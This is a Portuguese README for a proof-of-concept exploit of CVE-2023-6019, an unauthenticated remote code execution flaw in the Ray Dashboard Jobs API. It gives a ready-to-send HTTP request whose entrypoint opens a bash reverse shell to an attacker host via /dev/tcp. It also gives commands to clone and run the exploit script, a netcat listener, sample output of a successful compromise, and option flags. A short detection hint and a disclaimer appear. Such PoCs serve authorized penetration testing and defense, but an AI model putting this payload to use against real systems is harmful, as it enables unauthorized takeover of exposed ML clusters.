
Exploit de PoC para CVE-2023-6019 - Execução Remota de Código via API de Jobs do Ray Dashboard não autenticada.
PoC do exploit para CVE-2023-6019 — Execução Remota de Código via API de Jobs do Ray Dashboard sem autenticação.
Feito por oguiii
O Anyscale Ray é uma framework open-source para cargas de trabalho distribuídas de ML/IA. As versões anteriores à 2.6.4 expõem uma API de submissão de Jobs através do Ray Dashboard (porta padrão 8265) sem qualquer autenticação, permitindo que um atacante não autenticado envie jobs arbitrários e obtenha Execução Remota de Código no host.
O endpoint /api/jobs/ aceita um payload JSON com um campo entrypoint que é executado como um comando shell pelo processo worker do Ray — sem necessidade de credenciais.
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json
{
"entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
"runtime_env": {},
"job_id": null,
"metadata": {}
}
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <IP_ALVO> -p <PORTA> -l <LHOST> -lp <LPORT>
# Iniciar listener
nc -lvnp 4444
# Executar exploit
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
[*] Verificando versão do Ray em 192.168.1.100:8265...
[*] Versão da API Ray : 4
[*] Versão do Ray : 2.6.3
[+] VULNERÁVEL! Ray 2.6.3 é afetado pelo CVE-2023-6019
[*] Alvo : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submetendo job...
[+] Job submetido com sucesso!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc
[>] Certifique-se de que seu listener está pronto:
nc -lvnp 4444
Procure por requisições POST inesperadas para /api/jobs/ na porta 8265 em seus logs HTTP ou tráfego de rede.
Esta ferramenta destina-se exclusivamente a testes de penetração autorizados e fins educacionais.
O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.
Sempre obtenha autorização escrita adequada antes de testar.
| Flag | Descrição | Padrão |
|---|
-t | IP ou hostname do alvo | obrigatório |
-p | Porta do Ray Dashboard | 8265 |
-l | IP do atacante (reverse shell) | obrigatório |
-lp | Porta do atacante (reverse shell) | obrigatório |